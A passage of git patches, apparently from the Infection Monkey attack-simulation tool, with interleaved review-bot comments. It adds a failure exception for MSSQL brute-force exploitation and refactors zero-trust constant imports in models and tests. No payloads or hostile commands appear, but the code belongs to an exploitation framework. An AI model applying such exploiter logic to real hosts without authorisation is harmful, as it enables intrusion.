+ raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
 class MSSQLLimitedSizePayload(LimitedSizePayload):
diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py
index 3985c8a2e..3af70c796 100644
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@@ -26,7 +26,7 @@ from infection_monkey.telemetry.tunnel_telem import TunnelTelem
 from infection_monkey.windows_upgrader import WindowsUpgrader
 from infection_monkey.post_breach.post_breach_handler import PostBreach
 from infection_monkey.exploit.tools.helpers import get_interface_to_target
-from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
+from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
 from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
 from common.utils.attack_utils import ScanStatus, UsageEnum
@@ -192,7 +192,9 @@ class InfectionMonkey(object):
 self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value)
 host_exploited = False
 for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
+ if self.try_exploiting(machine, exploiter):
+ host_exploited = True
 VictimHostTelem('T1210', ScanStatus.USED, machine=machine).send()
 break
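Review bot: The `@@ -185` hunk keeps the `LOG.warning('No user/password combo was able to connect ...')` immediately before the new `raise FailedExploitationError(...)`, and the handler added in monkey.py's `@@ -311` hunk logs the same failure again at INFO, so one brute-force failure now produces two log lines at two levels; either drop the warning and let the exception carry the detail, `raise FailedExploitationError('No user/password combo was able to connect to host: {0}:{1}'.format(host, port))`, or keep the warning and leave the exception terse. In the `@@ -192` hunk the lone `+` before `if self.try_exploiting` looks like an added empty line directly under the `for` header; if that is what it is, drop it. The enclosing methods in both hunks extend beyond the hunk.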
@@ -311,6 +313,8 @@ class InfectionMonkey(object): machine, exploiter.__class__.__name__, exc) self.successfully_exploited(machine, exploiter) return True + except FailedExploitationError as e: + LOG.info("Failed exploiting %r with exploiter %s, %s", machine, exploiter.__class__.__name__, e) except Exception as exc: LOG.exception("Exception while attacking %s using %s: %s", machine, exploiter.__class__.__name__, exc) From c778ae7aa1ef87769ce41a7c8422e951bd556508 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 4 Nov 2019 11:27:34 +0200 Subject: [PATCH 43/53] Changed import to `import common.data.zero_trust_consts as zero_trust_consts` Looks better --- .../cc/models/zero_trust/aggregate_finding.py | 6 +- .../cc/models/zero_trust/event.py | 4 +- .../cc/models/zero_trust/finding.py | 10 +- .../models/zero_trust/segmentation_finding.py | 6 +- .../zero_trust/test_aggregate_finding.py | 14 +- .../cc/models/zero_trust/test_event.py | 6 +- .../cc/models/zero_trust/test_finding.py | 16 +- .../zero_trust/test_segmentation_finding.py | 12 +- .../reporting/test_zero_trust_service.py | 252 +++++++++--------- .../services/reporting/zero_trust_service.py | 63 +++-- .../zero_trust_tests/antivirus_existence.py | 13 +- .../communicate_as_new_user.py | 11 +- .../zero_trust_tests/data_endpoints.py | 23 +- .../zero_trust_tests/machine_exploited.py | 12 +- .../zero_trust_tests/segmentation.py | 10 +- .../test_segmentation_zt_tests.py | 25 +- .../telemetry/zero_trust_tests/tunneling.py | 8 +- 17 files changed, 253 insertions(+), 238 deletions(-) diff --git a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py index c3ed52649..38b551047 100644 --- a/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/aggregate_finding.py 
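Review bot: The new handler names the exception `e` while the neighbouring handlers use `exc`, and the message mixes `%r` for the machine with `%s` for the exception; for consistency use `except FailedExploitationError as exc:` and `LOG.info("Failed exploiting %r with exploiter %s: %s", machine, exploiter.__class__.__name__, exc)`. Logging at INFO without a traceback is appropriate if FailedExploitationError is the expected "attempt did not succeed" outcome that mssqlexec now raises, but it silently depends on FailedExploitationError not being a subclass of the exception type handled just above — the one that calls `successfully_exploited` and returns True — which is worth confirming, since that ordering would otherwise report a failed host as exploited. The handler falls through to whatever try_exploiting returns after the try statement, which lies outside the hunk.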
@@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding @@ -26,7 +26,7 @@ class AggregateFinding(Finding): def add_malicious_activity_to_timeline(events): AggregateFinding.create_or_add_to_existing( - test=TEST_MALICIOUS_ACTIVITY_TIMELINE, - status=STATUS_VERIFY, + test=zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE, + status=zero_trust_consts.STATUS_VERIFY, events=events ) diff --git a/monkey/monkey_island/cc/models/zero_trust/event.py b/monkey/monkey_island/cc/models/zero_trust/event.py index 6ad728d66..89b581fa0 100644 --- a/monkey/monkey_island/cc/models/zero_trust/event.py +++ b/monkey/monkey_island/cc/models/zero_trust/event.py @@ -2,7 +2,7 @@ from datetime import datetime from mongoengine import EmbeddedDocument, DateTimeField, StringField -from common.data.zero_trust_consts import EVENT_TYPES +import common.data.zero_trust_consts as zero_trust_consts class Event(EmbeddedDocument): @@ -19,7 +19,7 @@ class Event(EmbeddedDocument): timestamp = DateTimeField(required=True) title = StringField(required=True) message = StringField() - event_type = StringField(required=True, choices=EVENT_TYPES) + event_type = StringField(required=True, choices=zero_trust_consts.EVENT_TYPES) # LOGIC @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/finding.py b/monkey/monkey_island/cc/models/zero_trust/finding.py index df4eb12f7..90c9e1dc3 100644 --- a/monkey/monkey_island/cc/models/zero_trust/finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/finding.py 
@@ -5,7 +5,7 @@ Define a Document Schema for Zero Trust findings. from mongoengine import Document, StringField, EmbeddedDocumentListField -from common.data.zero_trust_consts import ORDERED_TEST_STATUSES, TESTS, TESTS_MAP, TEST_EXPLANATION_KEY, PILLARS_KEY +import common.data.zero_trust_consts as zero_trust_consts # Dummy import for mongoengine. # noinspection PyUnresolvedReferences from monkey_island.cc.models.zero_trust.event import Event @@ -30,18 +30,18 @@ class Finding(Document): times, or complex action we will perform - somewhat like an API. """ # SCHEMA - test = StringField(required=True, choices=TESTS) - status = StringField(required=True, choices=ORDERED_TEST_STATUSES) + test = StringField(required=True, choices=zero_trust_consts.TESTS) + status = StringField(required=True, choices=zero_trust_consts.ORDERED_TEST_STATUSES) events = EmbeddedDocumentListField(document_type=Event) # http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance meta = {'allow_inheritance': True} # LOGIC def get_test_explanation(self): - return TESTS_MAP[self.test][TEST_EXPLANATION_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.TEST_EXPLANATION_KEY] def get_pillars(self): - return TESTS_MAP[self.test][PILLARS_KEY] + return zero_trust_consts.TESTS_MAP[self.test][zero_trust_consts.PILLARS_KEY] # Creation methods @staticmethod diff --git a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py index 32a450f57..7633ed31f 100644 --- a/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/segmentation_finding.py 
@@ -1,11 +1,11 @@ from mongoengine import StringField -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_FAILED, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding def need_to_overwrite_status(saved_status, new_status): - return (saved_status == STATUS_PASSED) and (new_status == STATUS_FAILED) + return (saved_status == zero_trust_consts.STATUS_PASSED) and (new_status == zero_trust_consts.STATUS_FAILED) class SegmentationFinding(Finding): @@ -35,7 +35,7 @@ class SegmentationFinding(Finding): new_finding = SegmentationFinding( first_subnet=subnets[0], second_subnet=subnets[1], - test=TEST_SEGMENTATION, + test=zero_trust_consts.TEST_SEGMENTATION, status=status, events=[segmentation_event] ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py index 59bf1aa66..ce28ad7f7 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_aggregate_finding.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding 
@@ -10,9 +10,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)] + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + events = [Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) AggregateFinding.create_or_add_to_existing(test, status, events) @@ -29,9 +29,9 @@ class TestAggregateFinding(IslandTestCase): self.fail_if_not_testing_env() self.clean_finding_db() - test = TEST_MALICIOUS_ACTIVITY_TIMELINE - status = STATUS_VERIFY - event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK) + test = zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE + status = zero_trust_consts.STATUS_VERIFY + event = Event.create_event("t", "t", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) events = [event] self.assertEqual(len(Finding.objects(test=test, status=status)), 0) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_event.py b/monkey/monkey_island/cc/models/zero_trust/test_event.py index c0742407d..4a5afba50 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_event.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_event.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase @@ -14,7 +14,7 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title=None, # title required message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) with self.assertRaises(ValidationError): 
@@ -28,5 +28,5 @@ class TestEvent(IslandTestCase): _ = Event.create_event( title="skjs", message="bla bla", - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_finding.py index c7190d0f1..4299f7eb4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_finding.py @@ -1,6 +1,6 @@ from mongoengine import ValidationError -from common.data.zero_trust_consts import STATUS_FAILED, TEST_SEGMENTATION, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase 
@@ -20,20 +20,20 @@ class TestFinding(IslandTestCase): self.clean_finding_db() with self.assertRaises(ValidationError): - _ = Finding.save_finding(test="bla bla", status=STATUS_FAILED, events=[]) + _ = Finding.save_finding(test="bla bla", status=zero_trust_consts.STATUS_FAILED, events=[]) with self.assertRaises(ValidationError): - _ = Finding.save_finding(test=TEST_SEGMENTATION, status="bla bla", events=[]) + _ = Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status="bla bla", events=[]) def test_save_finding_sanity(self): self.fail_if_not_testing_env() self.clean_finding_db() - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) event_example = Event.create_event( - title="Event Title", message="event message", event_type=EVENT_TYPE_MONKEY_NETWORK) - Finding.save_finding(test=TEST_SEGMENTATION, status=STATUS_FAILED, events=[event_example]) + title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example]) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 1) - self.assertEqual(len(Finding.objects(status=STATUS_FAILED)), 1) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1) + self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py index 8258d7bdf..4afff9fe4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_segmentation_finding.py 
@@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.testing.IslandTestCase import IslandTestCase from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding @@ -12,11 +12,11 @@ class TestSegmentationFinding(IslandTestCase): first_segment = "1.1.1.0/24" second_segment = "2.2.2.0-2.2.2.254" third_segment = "3.3.3.3" - event = Event.create_event("bla", "bla", EVENT_TYPE_MONKEY_NETWORK) + event = Event.create_event("bla", "bla", zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) SegmentationFinding.create_or_add_to_existing_finding( subnets=[first_segment, second_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -26,7 +26,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, first_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -36,7 +36,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[first_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -45,7 +45,7 @@ class TestSegmentationFinding(IslandTestCase): SegmentationFinding.create_or_add_to_existing_finding( # !!! REVERSE ORDER subnets=[second_segment, third_segment], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) diff --git a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py index 98b99ac13..328be2e00 100644 --- a/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py 
+++ b/monkey/monkey_island/cc/services/reporting/test_zero_trust_service.py 
@@ -1,185 +1,197 @@ -from common.data.zero_trust_consts import AUTOMATION_ORCHESTRATION, DATA, PRINCIPLES, PRINCIPLE_DATA_TRANSIT, STATUS_FAILED, \ - TESTS_MAP, TEST_DATA_ENDPOINT_HTTP, TEST_EXPLANATION_KEY, STATUS_UNEXECUTED, TEST_DATA_ENDPOINT_ELASTIC, DEVICES, \ - PRINCIPLE_ENDPOINT_SECURITY, TEST_MACHINE_EXPLOITED, TEST_ENDPOINT_SECURITY_EXISTS, NETWORKS, PRINCIPLE_SEGMENTATION, \ - TEST_SEGMENTATION, PRINCIPLE_USER_BEHAVIOUR, STATUS_VERIFY, TEST_SCHEDULED_EXECUTION, PRINCIPLE_USERS_MAC_POLICIES, \ - TEST_COMMUNICATE_AS_NEW_USER, PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, TEST_MALICIOUS_ACTIVITY_TIMELINE, \ - PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, TEST_TUNNELING, PEOPLE, VISIBILITY_ANALYTICS, WORKLOADS, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService from monkey_island.cc.testing.IslandTestCase import IslandTestCase EXPECTED_DICT = { - AUTOMATION_ORCHESTRATION: [], - DATA: [ + zero_trust_consts.AUTOMATION_ORCHESTRATION: [], + zero_trust_consts.DATA: [ { - "principle": PRINCIPLES[PRINCIPLE_DATA_TRANSIT], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_DATA_TRANSIT], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_HTTP][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_HTTP][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_DATA_ENDPOINT_ELASTIC][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - DEVICES: [ + zero_trust_consts.DEVICES: [ { - "principle": 
PRINCIPLES[PRINCIPLE_ENDPOINT_SECURITY], - "status": STATUS_FAILED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ENDPOINT_SECURITY], + "status": zero_trust_consts.STATUS_FAILED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MACHINE_EXPLOITED][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_MACHINE_EXPLOITED][zero_trust_consts.TEST_EXPLANATION_KEY] }, { - "status": STATUS_FAILED, - "test": TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_FAILED, + "test": zero_trust_consts.TESTS_MAP + [zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS][zero_trust_consts.TEST_EXPLANATION_KEY] }, ] } ], - NETWORKS: [ + zero_trust_consts.NETWORKS: [ { - "principle": PRINCIPLES[PRINCIPLE_SEGMENTATION], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_SEGMENTATION], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_SEGMENTATION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SEGMENTATION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": 
zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - PEOPLE: [ + zero_trust_consts.PEOPLE: [ { - "principle": PRINCIPLES[PRINCIPLE_USER_BEHAVIOUR], - "status": STATUS_VERIFY, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USER_BEHAVIOUR], + "status": zero_trust_consts.STATUS_VERIFY, "tests": [ { - "status": STATUS_VERIFY, - "test": TESTS_MAP[TEST_SCHEDULED_EXECUTION][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_VERIFY, + "test": 
zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_SCHEDULED_EXECUTION][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] } ], - VISIBILITY_ANALYTICS: [ + zero_trust_consts.VISIBILITY_ANALYTICS: [ { - "principle": PRINCIPLES[PRINCIPLE_USERS_MAC_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_USERS_MAC_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_COMMUNICATE_AS_NEW_USER][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], - "status": STATUS_UNEXECUTED, + "principle": zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_ANALYZE_NETWORK_TRAFFIC], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_MALICIOUS_ACTIVITY_TIMELINE][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_MALICIOUS_ACTIVITY_TIMELINE][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, { - "principle": PRINCIPLES[PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], - "status": STATUS_UNEXECUTED, + "principle": 
zero_trust_consts.PRINCIPLES[zero_trust_consts.PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES], + "status": zero_trust_consts.STATUS_UNEXECUTED, "tests": [ { - "status": STATUS_UNEXECUTED, - "test": TESTS_MAP[TEST_TUNNELING][TEST_EXPLANATION_KEY] + "status": zero_trust_consts.STATUS_UNEXECUTED, + "test": zero_trust_consts.TESTS_MAP[zero_trust_consts.TEST_TUNNELING][ + zero_trust_consts.TEST_EXPLANATION_KEY] } ] }, ], - WORKLOADS: [] + zero_trust_consts.WORKLOADS: [] } def save_example_findings(): # arrange - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2 - Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 1 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_PASSED, + []) # devices passed = 2 + Finding.save_finding(zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_FAILED, + []) # devices failed = 1 # devices unexecuted = 1 # people verify = 1 # networks verify = 1 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # people verify = 2 # networks verify = 2 - Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY, []) # data failed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, 
zero_trust_consts.STATUS_FAILED, []) # data failed 3 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 4 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data failed 5 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED, []) # data verify 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data verify 2 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY, []) # data passed 1 - Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_PASSED, []) + Finding.save_finding(zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_PASSED, []) class TestZeroTrustService(IslandTestCase): 
@@ -191,52 +203,52 @@ class TestZeroTrustService(IslandTestCase): expected = [ { - STATUS_FAILED: 5, - STATUS_VERIFY: 2, - STATUS_PASSED: 1, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 5, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 1, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "Data" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 1, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 1, "pillar": "People" }, { - STATUS_FAILED: 0, - STATUS_VERIFY: 2, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 4, + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 2, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 4, "pillar": "Networks" }, { - STATUS_FAILED: 1, - STATUS_VERIFY: 0, - 